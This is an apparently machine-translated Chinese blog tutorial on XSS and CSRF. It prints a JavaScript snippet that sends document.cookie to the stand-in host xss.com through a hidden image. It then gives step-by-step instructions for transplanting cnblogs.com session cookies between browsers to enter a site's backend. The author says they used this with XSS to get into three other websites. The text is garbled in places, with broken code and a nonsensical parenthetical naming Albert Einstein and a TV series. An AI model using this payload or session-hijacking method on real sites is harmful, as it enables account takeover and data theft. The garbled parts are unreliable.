1.今天悠闲地查看了网站间脚本攻击(XSS)和网站间请求伪造(CSRF)的知识。XSS代表Cross Site Scripting(站点间脚本攻击)，类似于SQL注入攻击。SQL注入攻击使用SQL语句作为用户输入，CSRF的全称是Cross-site request forgery，是对网站的恶意利用，CSRF比XSS更危险。实际上，XSS攻击是由于网站输入框中不限制非法字符或不编码脚本内容而发生的！

va rimg=document . create element(' img ')；

Img.src='http://www.xss.com？cookie=' document . cookie；

Img.style.display=“无”；

document . getelementsbytagname(' body ')[0]。Appendchild(IMG)；

例如，这个代码，如果我们对网站输入框中的非法文字没有限制，用户输入这个脚本，将当前用户的cookie无意识地发送到我的恶意网站，我的恶意网站获得了get参数，获得了用户的cookie。(阿尔伯特爱因斯坦、Northern Exposure(美国电视剧)、恶意网站、恶意网站、恶意网站)当然，我们可以通过这种方法获取用户的各种数据。

2.当然，我今天说的主要不是这些，而是通过你收到的饼干植入你的浏览器后，可以访问网站后台。我将向你展示如何通过已经存在的cookie进入博客后台。我使用IE浏览器和Chrome _ 6494 _ 1。

首先，您可以通过IE浏览器登录博客花园，接收Cookiesview插件，查看IE浏览器下的所有cookie信息。然后找到cnblogs.com网站下的cookie。复制cn blogs cookie和密钥和值。

3.据悉，cookie属于个人信息数据，每个浏览器都保存在不同的地方。无法共享。如图IE浏览器处于登录状态，chorme浏览器未登录，重新打开Chorme浏览器。

4.然后，将刚刚复制的IE浏览器下博客的Cookie数据移植到chrome浏览器，欺骗Cookie登录博客背景，并在chrome浏览器中添加Cookie扩展，

5.打开cookie插件后，在cnblogs.com上查找cookie。默认情况下，没有登录的时候。cn blogs cookie不存在。然后单击“添加cookie”。添加cn blogs cookie

6.如果将这种方法与开始XSS攻击相结合，就能得到其他网站的Cookie信息，那么进入其他网站的后台就容易了，我自己也尝试过三个网站，都可以成功进入！当然，我说这不是所有人都黑别人的网站，只有理解这一点，才能更好地预防自己开发的网站的安全！